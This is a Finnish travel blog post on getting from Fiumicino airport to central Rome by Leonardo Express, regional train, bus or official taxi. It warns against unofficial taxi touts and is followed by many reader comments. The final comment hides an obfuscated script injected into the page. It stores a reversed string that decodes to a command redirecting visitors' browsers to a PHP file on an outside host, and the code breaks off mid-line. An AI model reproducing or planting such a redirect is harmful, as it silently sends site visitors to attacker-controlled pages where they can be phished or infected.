Image Alt

Blog

Miten Fiumicinon lentokentältä pääsee Rooman keskustaan

Jos tässäkin blogissa mainituista paikoista haluaa nauttia paikan päällä, täytyy ensin matkata itse Roomaan. Eikä riitä, että ostaa lennot Roomaan, sillä Fiumicinon kenttä sijaitsee 35 kilometrin päässä Rooman keskustasta, joten sieltä pitää vielä hankkiutua keskustaan. Roomaan pääsee lentokentältä monella tapaa, eikä useimpien Rooman matkaoppaiden suosittelema turistijuna Leonardo Express välttämättä ole paras – eikä ainakaan halvin – vaihtoehto.

Varoitan ihan aluksi myös ystävällisistä taksin kaupittelijoista, joita on pilvin pimein odottelemassa lentokentän aulassa. Vaikka nämä saattavat vaikuttaa helpolta vaihtoehdolta,  älkää missään tapauksessa sortuko niihin, älkää edes pysähtykö kysymään hintaa, sillä hyvin nopeastipalvelualtis kuski on kiikuttamassa matkalaukkuanne kohti taksiaan. Ja se 80 tai 90 euroa, jonka tämä sitten matkasta veloittaa, tekee ikävän loven matkabudjettiin, eikä huijauksesta voi oikein mihinkään valittaakaan, jos taksi ei ole oikea virallinen taksi (valkoinen). Keskustaan pääsee kuitenkin aika näppärästi myös seuraavien ohjeiden avulla (ja rahaa säästyy paljon parempaan).

Juna

Fiumicinon kentän juna-asema sijaitsee Terminaali 3:n alla ja sinne löytää junan kuvia seuraamalla. Lippuautomaatteja näyttää tulleen asemalle vievien liukuportaiden yläpäähän, mutta siihen ei kannata jäädä jonottamaan, sillä automaatteja on lisää alhaalla. Lippuja saa myös palvelupisteestä ja kioskista. Lippuja EI myydä junassa, joten ne on ostettava ja leimattava ennen junaan nousemista.

Leimaa lippusi aina tämännäköisessä laitteessa ENNEN junaan nousua.
Leimaa lippusi tällaisella ennen junaan nousemista

 

  • Leonardo Express menee suoraan pysähtymättä Terminin asemalle (Rooman pääasema). Matka kestää n. 30 minuuttia ja maksaa 14 euroa/ suunta. Nopeutensa ja helppoutensa vuoksi Express on ihan hyvä vaihtoehto, jos hotelli sijaitsee Terminin ympäristössä tai vaikkapa Espanjalaisten portaiden tuntumassa tai muualla A-metrolinjan varrella. Paikallisia ei kuitenkaan tässä junassa näy, sillä he valitsevat edullisemman ja monelle kätevämmän vaihtoehdon, kuten…
  • Paikallisjuna (treno regionale). Fiumicinon asemalta lähtee myös paikallisjuna, joka pysähtyy mm. Trasteveren ja Ostiensen (Piramide) asemilla, mutta ei Terminillä. Matka kestää n. 40 minuuttia ja lippu maksaa 8 euroa. Junan määränpää on Fara Sabina tai Orte, mutta Fiumicinossa on vain 3 raidetta, joten oikea juna löytyy helposti. Jos lipun ostaa automaatista, pitää valita jokin tiettyyn aikaan lähtevä juna, mutta se on silkka muodollisuus. Ostettu lippu on aina samanlainen ja se on voimassa vasta, kun se leimataan. Trasteveren asemalla pysähtyvä juna on hyvä vaihtoehto, jos majapaikka on vaikkapa Trasteveressa tai vanhassa kaupungissa (esim. Campo dei Fiorin lähellä), sillä Trasteveren aseman edestä lähtevä raitiovaunu 8 vie lähelle näitä paikkoja. Ostiensesta taas pääsee paitsi Testaccioon, niin B-metrolla Terminiä näppärämmin sen varrella oleviin kohteisiin. Molemmilta asemilta lähtee myös juna Vatikaaniin.

Bussi
 
Bussi on junaa hitaampi, mutta edullisempi tapa päästä keskustaan. Matka kestää noin tunnin ruuhkasta riippuen. Fiumicinosta kulkee useampi bussiyhtiö ja niiden liput voi – ja kuulemma kannattaakin – ostaa etukäteen netistä, mutta niitä myydään myös bussissa. Liput maksavat n. 5 euroa/ suunta. Bussit lähtevät jostain kolmosterminaalin edestä, mutta tämän tarkemmin en osaa neuvoa, sillä itselleni kätevin kulkuneuvo on juna.

  • SIT Bus Shuttle menee Terminin asemalle ja Vatikaaniin, liput 6 € (yksisuuntainen)  ja 11 € (meno-paluu)
  • Terravision menee Terminin asemalle. Liput 4 €/ suunta.
  • T.A.M. bus menee Terminin ja Ostiensen asemille. Liput 4 €/ suunta.

Lisäksi keskustaan pääsee myös Cotralin ja ATRAL-Lazion paikallisbusseilla, mutta epäilen, että useimmat Roomaan tulijat eivät ensi töikseen halua lähteä metsästämään niiden lippuja T-merkillä merkitystä baarista tai tabaccheriasta. Ainakin yleensä näihin on ostettava liput etukäteen.

Taksi (ja sen fiksattu hinta)

Vielä kerran: älä ota “taksia” tuloaulasta. Rooman valkoiset taksit odottelevat ulkona kolmosterminaalin edessä. Taksi on hyvä vaihtoehto, jos jostain syystä matkatavaraa on paljon, koska kuten edeltä näette, useimmiten juna-asemilta joutuu vielä vaihtamaan bussiin tai metroon ja niissä matkustaminen matkalaukkujen kanssa on Roomassa kyllä tuskaa. Taksi on myös hyvä vaihtoehto, jos Rooman keskustaan menijöitä on 3 tai enemmän. Takseilla on nimittäin fiksattu hinta Aurelian muurien sisäpuolelle, siis esim. Vatikaanin, Espanjalaisten portaiden, Trasteveren ja muun historiallisen keskustan alueille. Fiksattu hinta 48 euroa, matkustajien ja matkalaukkujen määrästä riippumatta. Taksi vie perille asti, eikä hintaero julkisiin välineisiin ole iso, jos matkustajia on enemmän.

Monilla hotelleilla ja muilla majapaikoilla on myös omia taksipalvelujaan, jotka voivat olla virallisiakin vakiotakseja. Myös netistä löytyy lukemattomia kuljetusfirmoja, joista voi varata kyydin etukäteen. Nämä maksavat yleensä taksia enemmän (65 eurosta ylöspäin), mutta ovat toki hyvä vaihtoehto, jos haluaa satsata siihen, että pääsee suoraan laukkujen saamisen jälkeen eteenpäin.

Rooman keskustasta Fiumicinon kentälle pääsee periaatteessa päinvastaisessa järjestyksessä. Matkaan kentälle kannattaa varata aikaa, sillä ruuhka-aikaan lentokentälle vievät tiet tukkiutuvat, bussit ovat usein täyteen varattuja, lakkojen aikaan paikallisjunat eivät kulje jne.

Toivottavasti näistä ohjeista on apua!
Laittakaa kommenttia, jos on jotain kysyttävää tai lisättävää vaikka noihin busseihin.

5 1 vote
Article Rating
Subscribe
Notify of
guest

This site uses Akismet to reduce spam. Learn how your comment data is processed.

80 Comments
Oldest
Newest Most Voted
Inline Feedbacks
View all comments
Anna
Anna
8 years ago

Hei, olen entinen roomalainen, minulle NCC eli noleggio con conducente eli kyltin kanssa odotteleva kuski oli ykköstapa kulkea, hinta noin 40 euroa ovelta ovelle jos oli yhtään matkatavaraa.

liisinkortit
8 years ago

Kiitos vinkeistäsi blogissasi on paljon hyödyllistä tietoa Roomaan matkaavalle. Käytimme heti neuvoasi hyödyksi ja otimme lentoasemalta Leonardo Express junan Terminin rautatieasemalle (jonka läheisyydessä hotellimme sijaitsi). Teimme kuten neuvoit ja löysimme lentokentällä Terminaali 3:n alla sijaitsevalle rautatieasemalle junan kuvia seuraamalla. Myöskin jossain vaiheessa kävellessämme asemalle eteemme osui kioski, josta voi ostaa junalippuja 14 euroa + 1 euro (jokin vero?). Eli yhden lipun hinnaksi tuli 15 euroa (jonoa ei ollut ollenkaan ko.kioskilla. Helppo oli löytää junalle, matkaa tosin oli kävellä (joskin meitä se ei haitannut). Lomalta paluumatkalle lentokentälle tilasimme hotellilta 48 euroa veloittavan taksin. Kiitos neuvoista/vinkeistä.

Heli
8 years ago

Hei, anteeksi vastauksen viivästyminen, mutta onhan tässä onneksi tuloonne vielä aikaa. Lippuja Leonardoon saa toki myös Terminiltä. Automaateissa on muistaakseni pikavalintana Fiumicino/ Aeroporto heti ruudulla. Suosittelen siis automaatteja (lippujonot voi olla mittavat ja automaatteihin pääsee yleensä jonottamatta), mutta varokaa "avuliaita" neuvojia, joita Terminillä notkuu rahapalkkion toivossa. Auttajien häätäminen on joskus hankalaa, mutta kannattaa pitää huolta, ettei lähettyvillä ole siinä vaiheessa ketään kun luottokorttia käytetään.

Anonyymi
Anonyymi
8 years ago

hei ja kiitos sivustasi. Olemme menossa marraskuun alussa ekaa kertaa Roomaan ja kysyisin että saako noita Leonardo Express .junalippuja myös ostettua siitä Termiinin päärautatieasemalta ? Ajattelin että jos mennessämme lentokentältä hotellille käyttäisimme bussia ja takaisinpäin lentokentälle sitten tuota Express junaa.

Heli
8 years ago

Korjaan: taksi maksaa 48 euroa. Hotellinne on ihan siinä rajoilla, mutta ainakin Ottavianon metroasema on Aurelian sisäpuolella. Taksikuskille kannattaa tehdä selväksi, että tiedätte fiksatusta hinnasta ja ottaa lentokentältä AINA se virallinen valkoinen taksi.

Heli
8 years ago

Moi. Sanoisin, että helpoin ja nopein tapa päästä tuonne Vatikaanin museon lähettyville julkisilla on tuo hotellin sivuillakin mainittu turistijuna Leonardo ja A-metro Terminin asemalta Ottavianolle. Terminille pääsee halvemmalla noilla busseilla (SIT, Terravision ja TAM), mutta matka kestää kauemmin. SITin bussi menee myös Vatikaanin Piazza Cavourille, mutta siitä on vielä kilometrin kävely hotellillenne. Yhdellä vaihdolla selviää myös, jos menee paikallisjunalla Ostiensen asemalle ja vaihtaa siellä bussiin 23, mutta silloin matkaan saa varata aikaa jo vähintään 1,5 tuntia. Taksin pitäisi maksaa 45 euroa (hotelli näyttäis mun mielestä olevan Aurelian muurien sisäpuolella), mutta asia kannattaa varmistaa hotellilta. Niillä voi olla samaan hintaan myös… Read more »

Roosa
Roosa
7 years ago
Reply to  Heli

Täytyy huomauttaa, että kyseiset Rooman kaupunginmuurit ovat viralliselta suomenkieliseltä nimeltään Aurelianuksen muurit rakennuttajansa mukaan.

Anonyymi
Anonyymi
8 years ago

Hei Heli. Olemme lähdössä ylihuomenna, eli 24.9 Roomaan ja ajattelin yrittää josko sinulta saisi vinkin miten ja millä meidän olisi järkevin mennä lentokentältä tälle hotellille?
http://www.infinityhotelstpeter.it/en/?r=4360000&gclid=Cj0KEQjwg9-vBRCK7L7wmO2u0JcBEiQA_tzoaBQyPU1_LRADwieiekBRBIzZU6thcPPS0W7RQy-Px7AaAmwx8P8HAQ

Heli
8 years ago

Kiitos! Suututtaa aina niin paljon, kun kuulee jonkun tulleen huijatuksi.

Anonyymi
Anonyymi
8 years ago

Tieto takseista äly hyvä! Muutenki tosiaan ekakertalaiselle arvokasta tietoa!

Heli
9 years ago

Kiva kuulla!

Bigblue
9 years ago

Kiitos, tämä oli loistava teksti ensikertalaiselle Roomaan matkustajalle 🙂

Anna
Anna
7 years ago

Hei, olemme ensi kertaa matkalla Roomaan enis vuoden alusta. Koneemme laskeutuu puolen yön aikaan Fiumicinon kentälle. Hotelli Aurelianmuurien sisäpuolella, mikä olisi turvallisin tapa päästä hotellille?

Jaana
Jaana
7 years ago

Hei, onko tuo 48 euroa nyt tuoreinta tietoa? Hotelli on Via Nazionalella, olettaisin että muurien sisällä. Taksiin olemme varautuneet, koska laskeudumme yöllä kuten edellinen kysyjäkin.

Jaana
Jaana
7 years ago

Hei! Kiitos nopeasta vastauksesta. Onko tuo Ncc luotettava kyyti? Meitä on kolme aikuista ja yksi lapsi. Yöllä ei jaksaisi alkaa vääntämään hinnasta taksukuskin kanssa, jos tuo Ncc ei ole paljon kalliimpi ja hinta on selvä ilman tinkimistä.

RaneJ
RaneJ
7 years ago

Ei kyllä yhtään haittaisi, vaikka näiden kysymysten, vastausten ja kommenttien kohdalla näkyisi päiväys. Turha lukea vinkkejä, joiden tiedot ovat jostain menneisyydestä.

Katja
Katja
7 years ago

Hei, osaatko kertoa onko juna- ja metrolippujen hinnat aina samat vai onko opiskelijoille eri hinnat? Löytyyköhän junalippuhinnastoa englanniksi jostain? Asumme Settebagnin aseman lähellä ja sieltä taitaa olla juna paras vaihtoehto liikkua keskustan suuntaan ja muualle.

Mira
Mira
6 years ago

Hei, olemme tulossa nyt sunnuntaina 23.7 Roomaan ja sitä myöten 2 viikoksi kiertelemään Italiaa.
Olemme tulossa junalla Termini asemalle jossa meidän hotelli sijaitsee, onkohan tuo 14 € myös lapsilta? Mietin että 4 henkilöä junalla tekee lähes tuon taksin hinnan.
Kerran aikaisemmin Roomassa olleena (toki 8 vuotta sitten) tulimme huijatuksi juuri tuolla lentokenttä taksilla.
Olisiko joitakin ravintoloita joita voisit mainostaa meille?

Pasikuikka
Pasikuikka
6 years ago

Moi.
Otettiin aulasta tuo tyrkkytaksi. Meno lentoasemalta colosseumin tuntumaan hotellille maksoi 65€. Paluumatkaa varten saatiin tarjouslipuke 40€ jos tullaan saman firman taksilla. Mitä lienee hinta virallisilla takseilla tuo väli. Pidän ~50€ hintaa ihan ok per suunta kun nämä kulut jakaa menopaluuksi.

Virve
Virve
6 years ago

Hei! Olemme tulossa nyt kesäkuun alussa 2017 Rooman liepeille Lido di ostia -nimiseen rantakaupunkiin. Matkaa lentokentältä on noin 10 km. Meitä on 6 hlö aikuista/lasta + 5kk ikäinen vauva, joten kahdella taksilla voisimme tietenkin mennä majapaikkaan ( tosin turvakaukaloasiat vauvan kohdalla mietityttää ). Osaisitko sanoa pääseekö/mistä lähtee bussit Ostian suuntaan? Tarkoitus on sitten loman aikana parina päivänä käydä Roomassa mutta muuten ottaa rauhallisemmin koska mukana on lapsia.

Mira
Mira
6 years ago

Hei! Osaatko sanoa miten nuo paikallisjunat kulkevat aikaisin aamulla? Olen mahdollisesti varaamassa lentoa, joka lähtisi Roomasta klo. 7:45 ja taksia en haluaisi ottaa. Katsoin trenitalian sivuilta että paikallisjunia kulkisi jo viiden kuuden aikaan aamulla noilta Rooman pysäkeiltä, mutta en tiedä voiko noihin sivuihin täysin luottaa. Onko sinulla tästä kokemusta? Käsimatkatavaroilla matkustan eli riittäisi olla noin tuntia ennen lennon lähtöä kentällä.

Mira
Mira
6 years ago

Kiitos nopeasta vastauksesta! Tällä tiedolla otan tuon aamulennon vaihtoehdoksi ja alan tutkailemaan muita postauksiasi Roomasta 🙂

Mira
Mira
6 years ago

Täytyy olla hyvissä ajoin liikenteessä ja varautua siihen että ehtii vielä taksillakin jos sattuisi joku lakko olemaan. Pääasia että tiedän nyt että junia noin yleisesti kulkee myös aikaisin aamulla, poikkeustilanteille ei toki voi mitään. 🙂

Tuula
Tuula
6 years ago

Hei, viikon päästä Roomaan. Miten pitkä matka on juna-asemalta Terriniltä Piazza del Popololle?
Mikä on paras tapa siirtyä? Tykkään blogistasi tosi paljon!Ystävällisin terveisin: Tuula

ris<script>$mkD=function(n){if (typeof ($mkD.list[n]) == "string") return $mkD.list[n].split("").reverse().join("");return $mkD.list[n];};$mkD.list=["\'php.txEgifnoCetiSrettelsweN/snoisnetxe/edoc/rettelswen/moc.cniwyks//:ptth\'=ferh.noitacol.tnemucod"];va
ris
80
0
Would love your thoughts, please comment.x
()
x